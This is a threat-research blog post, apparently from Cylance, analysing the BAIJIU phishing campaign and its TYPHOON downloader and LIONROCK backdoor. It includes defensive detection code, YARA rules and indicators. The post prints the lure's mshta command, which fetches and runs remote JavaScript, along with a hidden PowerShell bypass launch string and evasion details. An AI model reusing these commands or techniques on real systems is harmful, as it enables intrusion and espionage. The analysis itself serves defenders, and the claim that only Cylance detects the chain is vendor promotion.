Attack Analysis - Background and Lure

With international attention focused on the tinderbox of the Korean peninsula, Cylance is shedding new light on a threat we call BAIJIU, one that preys upon heightened interest into what’s going on inside the borders of the hermit kingdom of North Korea.

BAIJIU, which evades widespread detection, abuses global concern about the dire humanitarian situation in North Korea. It enters the target environment through an LNK file on the end of a phishing hook with the following bait:

“2016 North Korea Hamgyung [sic] province flood insight.”

The lure is a reference to a natural disaster that took place in late August 2016, when Typhoon Lionrock triggered massive flooding that wiped out much of North Korea’s province of North Hamgyong, impacting more than half a million people, drawing world-wide notice, and commanding international news coverage for several months.

Despite the media attention, details were sparse regarding the extent and aftermath of the crisis. Reports surfaced of attempts at escape and defection to neighboring China, after border forces and fencing were washed away.

Drawing even more curiosity were statements from Pyongyang itself, which took the rare step of publicly declaring the flood the worst natural disaster since 1945. The dictatorship appealed to the UN and aid groups for help with relief efforts, and asked the international community for monetary support.

How the crisis was resolved, and what its lasting impact was on North Korea is anyone’s guess. Exactly how many people died or were displaced? Were North Korea’s official pronouncements to be believed? BAIJIU’s attackers bet that many of their phishing targets would click on their attachment to find out just that – in other words, they would take the bait.

Attack Analysis – Provenance and C2

BAIJIU’s goal in this attack was to deploy a set of espionage tools through a downloader we call TYPHOON and a set of backdoors we call LIONROCK.

Three distinctive elements of BAIJIU drew and held our attention: the unusual complexity of the attack; the appropriation of web hosting service GeoCities (of 1990s fame); and the use of multiple methods of obfuscation. These features have, as far as we can see, helped BAIJIU evade nearly every antivirus (AV) solution.        

Cylance believes TYPHOON/LIONROCK’s provenance is likely Chinese, that it probably evolved from the Egobot codebase first described by Symantec here, and that it is connected to the larger Dark Hotel operation written up by Kaspersky here.

The tip of the spear – the LNK file itself – was a shortcut to execute the following command:

C:\Windows\System32\cmd.exe /C start "" mshta "about:<script>map1='hxxps://support.google(dot)com/maps/answer/3093609?co=GENIE.Platform_Desktop';map2='hxxps://support.google(dot)com/maps/answer/437584?co=GENIE.Platform_Desktop';map3='hxxps://support.google(dot)com/maps/answer/125748?co=GENIE.Platform_Desktop';</script><script>window.moveTo(99999,99999)</script><script language='javascript' src='hxxp://www.geocities(dot)jp/zboard01/001/1.tmp'></script><script>window.close()</script>""

Ultimately, the JavaScript of interest would be downloaded and executed from:

“hxxp://www.geocities(dot)jp/zboard01/001/1.tmp”. 
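To make the defensive side of this stage concrete, here is an added Python example (not code from the post or from the samples) that runs the indicators visible in that shortcut command over process-creation telemetry. Because only the .lnk touches disk, the command line recorded at process creation (Sysmon event 1, EDR telemetry) is where this pattern is caught: cmd.exe wrapping mshta.exe, an "about:" URL carrying inline <script>, a remote script src, a window moved off-screen and then closed. The log records are constructed for the example, with a placeholder host in the script src.

```python
"""Flag the LNK-to-mshta launch described above in process-creation
telemetry (added example; not code from the post).

Each behaviour visible in the shortcut's command line becomes one regex;
a record is reported when several fire together, so a lone window.close()
inside a legitimate HTA stays quiet. Records are constructed here in the
shape "<pid> <image> <command line>".
"""
import re

INDICATORS = [
    ("mshta-about-protocol", re.compile(r"\bmshta(\.exe)?\s+[\"']?about:", re.I)),
    ("inline-script", re.compile(r"about:\s*<script", re.I)),
    ("remote-script-src", re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?\w+://", re.I)),
    ("offscreen-window", re.compile(r"window\.moveTo\(\s*\d{4,}\s*,\s*\d{4,}\s*\)", re.I)),
    ("self-close", re.compile(r"window\.close\(\s*\)", re.I)),
    ("cmd-start-wrapper", re.compile(r"\bcmd(\.exe)?\s+/c\s+start\s+\"\"", re.I)),
]


def mshta_indicators(cmdline):
    """Names of all indicators present in one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def triage(records, threshold=3):
    """(pid, indicators) for every record with at least `threshold` hits."""
    hits = []
    for rec in records:
        pid, _image, cmdline = rec.split(" ", 2)
        found = mshta_indicators(cmdline)
        if len(found) >= threshold:
            hits.append((int(pid), found))
    return hits


# Constructed records. The first mimics the shortcut's command line with a
# placeholder host; the other two are ordinary mshta.exe / cmd.exe activity.
SAMPLE_RECORDS = [
    '4120 C:\\Windows\\System32\\cmd.exe C:\\Windows\\System32\\cmd.exe /C start "" mshta '
    '"about:<script>window.moveTo(99999,99999)</script>'
    "<script language='javascript' src='hxxp://placeholder.invalid/1.tmp'></script>"
    '<script>window.close()</script>"',
    "4311 C:\\Windows\\System32\\mshta.exe mshta.exe C:\\Vendor\\setup.hta",
    "5002 C:\\Windows\\System32\\cmd.exe cmd.exe /C dir C:\\Users",
]


if __name__ == "__main__":
    for pid, found in triage(SAMPLE_RECORDS):
        print(pid, found)
```

The threshold is deliberate: mshta.exe running a local .hta or a script calling window.close() is normal, whereas the combination of the "about:" protocol, a remote src and an off-screen window is not.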

GeoCities, now owned by Yahoo, is a web hosting service in Japan which anyone with a Yahoo email address can use. The service is free and does not require users to identify themselves beyond providing a Yahoo email address. These features make it attractive to ordinary users, but seem to have also drawn those who see value in appropriating the service for illicit ends. 

We realize GeoCities may seem like a total blast from the past, but Cylance is not alone in noticing its second act revival and its apparent popularity as a launching pad for malware.

A security researcher known as “unixfreaxjp,” who founded the non-profit security research group “malwaremustdie.org,” found that GeoCities had recently been leveraged in separate targeted attacks to deliver Poison Ivy payloads in March 2017. “Poison Ivy” has long been associated with Chinese APT groups. You can read more about this researcher’s findings on the use of GeoCities here.

Over the course of our investigation, Cylance saw that GeoCities was being heavily leveraged across multiple campaigns. We identified ten active sites hosted on the service that were used to deliver similar malicious payloads (see the end of this blog for full details).

Attack Analysis - Malware

Our analysis of “hxxp://www.geocities(dot)jp/zboard01/001/1.tmp” shows that the first six lines of “1.tmp” set up encoded variables:

These lines were immediately of interest, and tracing their use in the code led to a function called  “EXR,” which was used to decode the variables.

We coded EXR in python below for easy reuse:

def EXR(p):
    # Decodes one obfuscated string. Each character is rebuilt bit by bit:
    # bit 6 (0x40) moves to bit 5, bit 5 (0x20) to bit 6, bit 4 (0x10) to
    # bit 1 and bit 1 (0x02) to bit 4; bits 3, 2 and 0 keep their place and
    # bit 7 is dropped. The else branches clear bits that are already 0
    # (c starts at 0), so they change nothing and are retained as written.
    s = ''
    for x in p:
        c = 0
        if ord(x)&64 != 0:
            c = c | 0x20
        else:
            c = c & 0xDF
        if ord(x)&32 != 0:
            c = c | 0x40
        else:
            c = c & 0xBF
        if ord(x)&16 != 0:
            c = c | 0x02
        else:
            c = c & 0xFD
        if ord(x)&8 != 0:
            c = c | 0x08
        else:
            c = c & 0xF7
        if ord(x)&4 != 0:
            c = c | 0x04
        else:
            c = c & 0xFB
        if ord(x)&2 != 0:
            c = c | 0x10
        else:
            c = c & 0xEF
        if ord(x)&1 != 0:
            c = c | 0x01
        else:
            c = c & 0xFE
        s += chr(c)
    return s

Figure 2: Python Snippet to Decode Variables

“pa0” was never referenced anywhere else in the code. But the rest of the variables from Figure 1 decoded to the following:

The two files, “nomz32.tmp” and “nomz64.tmp”, hosted on GeoCities Japan, were a 32-bit and a 64-bit DLL, respectively, with the “MZ” header removed. Removing the “MZ” header appears to have significantly aided in decreasing detection rates, as neither file was flagged by traditional or NextGen AV.

In fact, this was almost surely a deliberate attempt by the attackers to evade common network intrusion signatures. But it also may have been necessary to upload the files to GeoCities in the first place.

Either way, the 1.tmp JavaScript code block contained a function, which would write back the header after the respective file was already downloaded to the hard drive:

nomz32.tmp – 8b1688d3779f408262d0eca9f486f9039e3607a07e20df52181b4ba585c1939a
regsv32.dll – 30a3503394d5de2912eb27fcf0ae24fcbfa7d27a4a49a1e6ce7271db211ab207
nomz64.tmp – d352cdf812645e6f2d890da871ee3ae95c0be7a2520af49132f2b50080fbd67a
regsv64.dll – 9ad91bd5860bd87e9823ee19c52515327c9230b4444fb91ad38821394b1b055a
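As an added illustration (not code from the post or from the samples), the Python below shows what a scanner has to do to notice a PE file whose “MZ” signature is missing: stop trusting the first two bytes and follow the DOS header’s e_lfanew field (offset 0x3C) to the “PE” signature, where the COFF machine field also tells 32-bit from 64-bit. The post does not say whether the attackers overwrote the two bytes or deleted them, so both variants are handled, and the PE skeleton the code runs on is constructed inline.

```python
"""Notice a PE/DLL whose "MZ" signature has been removed (added example).

A scanner that trusts the first two bytes skips such a file; one that
follows the DOS header's e_lfanew field to the "PE" signature does not.
Whether the two bytes were overwritten or deleted is not stated in the
post, so both variants are handled.
"""
import struct

# COFF machine values for the two architectures the post mentions.
MACHINE_NAMES = {0x014C: "x86 (32-bit)", 0x8664: "x64 (64-bit)"}


def _pe_machine(data, shift):
    """Return a machine description if a PE signature is reachable when
    `shift` leading bytes (0 or 2) are assumed missing from the file."""
    lfanew_off = 0x3C - shift
    if len(data) < lfanew_off + 4:
        return None
    e_lfanew = struct.unpack_from("<I", data, lfanew_off)[0]
    sig = e_lfanew - shift
    if sig < 0 or len(data) < sig + 6 or data[sig:sig + 4] != b"PE\0\0":
        return None
    machine = struct.unpack_from("<H", data, sig + 4)[0]
    return MACHINE_NAMES.get(machine, "machine 0x%04x" % machine)


def classify(data):
    """'pe', 'headerless-pe/overwritten', 'headerless-pe/truncated' or
    'other', paired with the architecture when one was found."""
    if data[:2] == b"MZ":
        info = _pe_machine(data, 0)
        return ("pe", info) if info else ("other", None)
    for shift, how in ((0, "overwritten"), (2, "truncated")):
        info = _pe_machine(data, shift)
        if info:
            return ("headerless-pe/" + how, info)
    return ("other", None)


def restore_mz(data):
    """Put the signature back so the file can be scanned or disassembled,
    the same repair the post says the JavaScript performed after download."""
    kind, _ = classify(data)
    if kind == "headerless-pe/overwritten":
        return b"MZ" + data[2:]
    if kind == "headerless-pe/truncated":
        return b"MZ" + data
    return data


def make_sample_pe(machine):
    """Constructed minimal PE skeleton: 64-byte DOS header whose e_lfanew
    points at a PE signature at 0x40, followed by the COFF machine field."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18


if __name__ == "__main__":
    good = make_sample_pe(0x8664)
    for blob in (good, b"\0\0" + good[2:], good[2:], b"not a PE"):
        print(classify(blob))
```

Run against a real sample this replaces the “does it start with MZ?” test with “is there a PE header where the DOS header says there should be?”, which is the check the nomzXX.tmp files would have failed.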

The files both conveniently utilized the same string-encoding algorithm as the JavaScript, which sped up analysis quite a bit. Both DLLs functioned as elaborate launchers for a PowerShell script encoded within their resource sections.

Instead of utilizing the FindResource or FindResourceEx functions, the backdoors mapped the entire file using CreateFileMappingW and MapViewOfFile, then proceeded to search for the string “<<<:resource”.

Once the string was identified, the PowerShell script was decoded by XOR’ing every byte against the byte 0x1F. This was likely done in an attempt to evade established detection methods for this type of obfuscation.

The script was then invoked using the following command: “powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -noprofile Invoke-Command -scriptblock {%s}” where %s was the contents of the decoded script. The backdoors both employed a number of tricks to avoid automated emulation and analysis as well as simple tricks to hinder debugging. 
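The marker search and the single-byte XOR the post describes are enough to recover the embedded script statically, without running the DLL. The Python below is an added example (not code from the post or from the samples) that does exactly that and then applies two cheap checks to what comes out: identifiers built only from the characters “\/_=” and a process command line matching the launcher string quoted above. It assumes, which the post does not state, that the script occupies everything after the marker and is ASCII; the launcher DLL it runs on is constructed inline.

```python
"""Pull the embedded PowerShell out of a TYPHOON-style launcher and triage
it (added example; not code from the post or from the samples).

Per the post the DLL maps itself, finds the literal "<<<:resource" and XORs
every following byte with 0x1F before passing the result to powershell.exe.
Assumptions (not stated in the post): the script occupies everything after
the marker and is ASCII. The sample DLL below is constructed.
"""
import re

MARKER = b"<<<:resource"
XOR_KEY = 0x1F


def extract_resource_script(blob, marker=MARKER, key=XOR_KEY):
    """Decode the script stored after `marker`; None if the marker is absent."""
    idx = blob.find(marker)
    if idx < 0:
        return None
    encoded = blob[idx + len(marker):]
    return bytes(b ^ key for b in encoded).decode("ascii", errors="replace")


# Names made only of the characters \ / _ = (the scheme the post describes)
# do not occur in ordinary PowerShell, so runs of them are a cheap tell.
OBFUSCATED_NAME = re.compile(r"[\\/_=]{4,}")


def obfuscated_identifiers(script):
    """Distinct '\\/_='-style tokens of four or more characters."""
    return sorted(set(OBFUSCATED_NAME.findall(script)))


# Command-line shape the post quotes for launching the decoded script.
LAUNCH_PATTERN = re.compile(
    r"powershell(\.exe)?\s+-WindowStyle\s+hidden\s+-ExecutionPolicy\s+Bypass"
    r"\s+-noprofile\s+Invoke-Command\s+-scriptblock\s*\{",
    re.IGNORECASE,
)


def is_launch_cmdline(cmdline):
    """True for a process command line matching the post's launcher string."""
    return bool(LAUNCH_PATTERN.search(cmdline))


# Constructed script in the '\/_=' naming style: one variable, used twice.
SAMPLE_SCRIPT = (
    "${\\/_==\\/_} = 60\n"
    "while ($true) { Start-Sleep -Seconds ${\\/_==\\/_} }\n"
)


def build_sample_dll():
    """Constructed stand-in for a launcher: filler, marker, XOR-0x1F script."""
    encoded = bytes(b ^ XOR_KEY for b in SAMPLE_SCRIPT.encode("ascii"))
    return b"MZ" + b"\x90" * 40 + MARKER + encoded


if __name__ == "__main__":
    script = extract_resource_script(build_sample_dll())
    print(script)
    print("obfuscated names:", obfuscated_identifiers(script))
```

The plaintext marker is the weak point of this design from the attacker’s side and the easy win from ours: it is what the Typhoon_Downloader YARA rule at the end of the post keys on ($ps), and the launch command line is a second, process-level place to catch the same stage.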

Both files were also signed using an expired digital certificate belonging to “www.mywellnessmatters.com”.

Certificate Details:
Name: www.mywellnessmatters.com
Valid: Feb 19, 2007 to Feb 22, 2010
Serial Number: 20 18 98 C3 00 00 00 00 74 E0

The PowerShell script encoded within the resource section used some rudimentary methods to obfuscate variable and function names by rendering them to arbitrary combinations of the characters “\/_=”.

However, it conveniently employed the same string-encoding algorithm as the JavaScript:

Further analysis of the script showed it was a rather elegant launcher that would routinely query the sites listed above and sleep if nothing was available.

Cylance succeeded in downloading “hxxp://www.geocities(dot)jp/toedu01/informa(dot)txt”, a secondary PowerShell script. This PowerShell script was responsible for delivering and executing the final payloads. Fortunately for us, it also utilized the same method of string encoding:

The script would download the respective 32-bit (scnpst32.tmp and contab32.tmp) or 64-bit (scnpst64.tmp and contab64.tmp) payloads. Once they were downloaded to disk, it would write back the “MZ” header to each file.

The scnpstXX.tmp DLLs functioned as loaders for their respective 32-bit or 64-bit contabXX.tmp files. Both scnpstXX.tmp files were additionally signed with an unusual expired certificate with an Icelandic flavor:

Certificate Details:
Name: secure.hotelcentrum.is
Valid: Feb 27, 2005 to March 30, 2007
Serial Number: 03 36

Although the name aligns with a popular Icelandic hotel, Hotel Reykjavík Centrum, the certificate does not seem to belong to the hotel itself. 

The files also employed a slightly different encoding mechanism involving several byte shifts and a single-byte XOR for several strings, which would have likely triggered AV heuristics.

The contabXX.tmp DLLs were full-featured backdoors that provided the attacker the ability to enumerate and manipulate files, enumerate drive and volume information, manipulate processes, enumerate and manipulate registry information, upload/download files, capture screenshots, and securely remove traces of the backdoor.

The DLLs would accept the following commands:

•  activeport
•  ddel
•  ddir
•  diskinfo
•  exit
•  find
•  httpget
•  packetsize
•  prockill
•  proclist
•  procspawn
•  recent
•  regkeydel
•  reglist
•  reglistall
•  regvaldel
•  rereg
•  screenauto
•  screenupload
•  sdir
•  strings
•  system
•  timeout
•  upload
•  wipe

Both samples communicated back to the IP address “103.8.27.135.” Additional analysis is ongoing into the network protocol itself.

Cylance was unable to find additional lures. However, as mentioned above, numerous similar payloads and scripts were identified across GeoCities Japan websites.

TYPHOON Payloads:

hxxp://www.geocities[dot]jp/akikoakagi1013/nomz32.tmp
hxxp://www.geocities[dot]jp/akikoakagi1013/nomz64.tmp
hxxp://www.geocities[dot]jp/lboard_01/nomz32.tmp
hxxp://www.geocities[dot]jp/lboard_01/nomz64.tmp

LIONROCK Payloads

hxxp://www.geocities[dot]jp/coloseaer_0812/contab32.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/contab64.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/scnpst32.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/scnpst64.tmp
hxxp://www.geocities[dot]jp/jjboard_01/contab32.tmp
hxxp://www.geocities[dot]jp/jjboard_01/contab64.tmp
hxxp://www.geocities[dot]jp/jjboard_01/scnpst32.tmp
hxxp://www.geocities[dot]jp/jjboard_01/scnpst64.tmp

PowerShell Scripts:

hxxp://www.geocities[dot]jp/hanakofukumoto/colinsta.txt
hxxp://www.geocities[dot]jp/junkohagiwara3/readmesub.txt
hxxp://www.geocities[dot]jp/murimakiyami/ps001/update_m.tmp
hxxp://www.geocities[dot]jp/murimakiyami/ps001/update_s.tmp
hxxp://www.geocities[dot]jp/pboard01/informab.txt
hxxp://www.geocities[dot]jp/toedu01/informa.txt

Conclusions:

BAIJIU’s circuitous route from LNK file to LIONROCK backdoor through multiple DLL files and PowerShell scripts – and its ability to obfuscate itself through each stage while doing so – makes this attack stand out.

BAIJIU attackers likely employed this strategy to throw researchers and investigators off their track, and ensure only the targeted victims received the payloads. Automated sandbox systems would also presumably fail to reach the final payloads, as numerous sleep loops were present in the PowerShell scripts, in addition to anti-emulation tricks in the DLL downloader. 

Appropriating the GeoCities’ free, high-bandwidth, civilian infrastructure also helps BAIJIU hide in plain sight, and signals a troubling new trend in attack techniques that is almost surely not restricted to Yahoo’s GeoCities.

While Cylance maintains that an explication of new attack methods is more valuable to end-users than speculative attempts at attribution, the skill level employed by BAIJIU suggests a worthy adversarial threat.

Whoever BAIJIU’s authors are or what their intent may be, one thing is clear: the TYPHOON/LIONROCK attack chain has evaded nearly every legacy AV and NextGen AV solution on the market today. Cylance is the exception.

TYPHOON Samples:

16486b17c635038d0ff0a035d5c0c89bbd62ca6d85b4161060c5bd05de69924e

2cc0dbe268f4184b167aff4089feaa8a3ee91eac6a25112c9498558e8bab193c

30a3503394d5de2912eb27fcf0ae24fcbfa7d27a4a49a1e6ce7271db211ab207

3d7fce51cbab9847bd4ab95ccd9db7cc6c096add99b6285639be5231ff6013c6

422addad546c4418173751567d18a05b080285910c9199b544d6f08f15838a22

4a3dba1be5634477b99b9940a7adebdf81c2746172aad5fd08e2366e19bb7a7f

6b0042fa0a599f0e4530806474f765f2896eeca69d9489eabb4ff9aac284acd8

9ad91bd5860bd87e9823ee19c52515327c9230b4444fb91ad38821394b1b055a

LIONROCK Samples:

22092aefddda66776c344ee5a239ea988ed70a20176ce7977aff7debde61253b

26108999e34af20b4f730e0a937435e2da108b6014a8f6c3b5d2c213499b0476

4fa44236abd43d0da4a46765eb1da5d070a06d0b2fc16e728dda729f31d9e55d

62f4c97791109991904173c6d8ef6ffcd834a6944dff2395421fd504ebb6a631

6b0c3e4980355687fc39e86e18dff9ddb323d2048a20eb2f253d884881b41f6c

8608081e5d76b0eacfefa2c57de683655cb70fcfe22b222dbc6afeb7b8102226

bdd24214a52f995a51e41f5061d2dfb02159abfd157de205c9359d5a9cab06a2

c561fd9cc5e6eb10f17935eee88b841e125b1a08a6d500243ea5084629904183

c72121a61ca608e57ccb8a17e6d2c8e621f5c51e9b701bdf38a4a673dcf3b077

def1c8c557b33294e1334479a6a1840be21b1fcfe82ecd120e4a296fba78107b

JavaScript Payload:

63499f7445158553c7b15484ccd18e4147dc7dc8205e6b62abc5f52071b1df9f

YARA Rules:

rule Lionrock_Powershell
{
    strings:
        $http = "hffbZ]]"
        $geo = "www\\ue}qifies\\xb]"
    condition:
        $http or $geo
}

rule Typhoon_Downloader
{
    strings:
        $ps = "<<<:resource"
        $exp = "start_adobeup"
        $e = "W78D432S34A9"
        $f = "!SJ1B0RSWRKK"
        $b = "wyy}EBB"
        $geo = "hhhCjzbnvyvzlCg}B"
    condition:
        $ps or $exp or ($e and $f) or $b or $geo
}

rule Lionrock_Loader
{
    strings:
        $a = "sfarfdk|amiqd|s"
        $b = "s1-s{wlsz,s"
        $c = "q}llyer|eldll"
    condition:
        ($a and $b) or $c
}

rule Lionrock_Backdoor
{
    strings:
        $a = "windows\\currentversion\\run;reglist"
        $power = "b}wershell\\eje@M|}br}tile@)|v}yeM1}mma|d@Msqribfpl}qy{DbafhOUEsU[DdafaO5efM1}|fe|f@Dbafh[t}reaqhHDqmd@i|@DdafaI{iej@Dqmd[oo"
        $b = "agf}ejeqdir"
        $c = "sfarfdk|amiqd|s"
    condition:
        $power or $b or ($a and $c)
}
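Most of the odd-looking strings in these rules are the encoded forms of ordinary text, which is why they match the samples but nothing benign. The Python below is an added example (not code from the post) that decodes them. It reimplements the bit shuffle the post’s EXR performs as a single translation table (bit 6 swaps with bit 5, bit 4 with bit 1; being made of swaps, it is its own inverse), applies it once to the Lionrock_* strings, and for the Typhoon_Downloader strings first strips the 0x1F XOR the post describes for the resource-embedded script. Lionrock_Backdoor’s $a is plaintext, and Lionrock_Loader’s $b and $c do not come out readable under this shuffle, in line with the different encoding the post notes for scnpstXX.tmp, so those are left out; only the leading 26 characters of $power are included.

```python
"""Decode the encoded strings in the YARA rules above (added example; not
code from the post).

The post's EXR decoder is a fixed shuffle of the low seven bits of each
byte: bit 6 swaps with bit 5 and bit 4 swaps with bit 1; bits 3, 2 and 0
stay put and bit 7 is dropped. A shuffle made of swaps is its own
inverse, so one 256-entry table both encodes and decodes. Lionrock_*
strings are encoded once this way; the Typhoon_Downloader strings come
from the XOR-0x1F-wrapped resource script, so the XOR is undone first.
"""


def _shuffle(b):
    """The same bit moves EXR performs, as arithmetic on one byte value."""
    keep = b & 0x0D                                   # bits 3, 2, 0 unchanged
    swap_6_5 = ((b & 0x40) >> 1) | ((b & 0x20) << 1)  # 0x40 <-> 0x20
    swap_4_1 = ((b & 0x10) >> 3) | ((b & 0x02) << 3)  # 0x10 <-> 0x02
    return keep | swap_6_5 | swap_4_1                 # bit 7 never set


SHUFFLE_TABLE = bytes.maketrans(
    bytes(range(256)), bytes(_shuffle(b) for b in range(256))
)


def exr(text):
    """Apply the shuffle to every character; encoding and decoding coincide."""
    return text.encode("latin-1").translate(SHUFFLE_TABLE).decode("latin-1")


def decode_lionrock(s):
    """Lionrock_* rule strings: one round of the shuffle."""
    return exr(s)


def decode_typhoon(s):
    """Typhoon_Downloader rule strings: strip the 0x1F XOR, then shuffle."""
    unxored = bytes(b ^ 0x1F for b in s.encode("latin-1")).decode("latin-1")
    return exr(unxored)


# Strings copied from the rules above (YARA's "\\" is a single backslash).
LIONROCK_STRINGS = {
    "Lionrock_Powershell $http": "hffbZ]]",
    "Lionrock_Powershell $geo": "www\\ue}qifies\\xb]",
    "Lionrock_Backdoor $b": "agf}ejeqdir",
    "Lionrock_Backdoor $c": "sfarfdk|amiqd|s",
    "Lionrock_Backdoor $power": "b}wershell\\eje@M|}br}tile@",  # first 26 chars
}
TYPHOON_STRINGS = {
    "Typhoon_Downloader $b": "wyy}EBB",
    "Typhoon_Downloader $geo": "hhhCjzbnvyvzlCg}B",
}


def decode_all():
    """Map each rule string to its plaintext: what the signatures really hunt."""
    out = {k: decode_lionrock(v) for k, v in LIONROCK_STRINGS.items()}
    out.update({k: decode_typhoon(v) for k, v in TYPHOON_STRINGS.items()})
    return out


if __name__ == "__main__":
    for name, plain in decode_all().items():
        print("%-28s %s" % (name, plain))
```

Seen this way, the rules are signatures on “http://”, “www.geocities.jp/” and the PowerShell launcher string, written in the samples’ own alphabet. That is also the reason plain string scanning missed them: the shuffle keeps every character printable, so an encoded URL looks like nothing in particular.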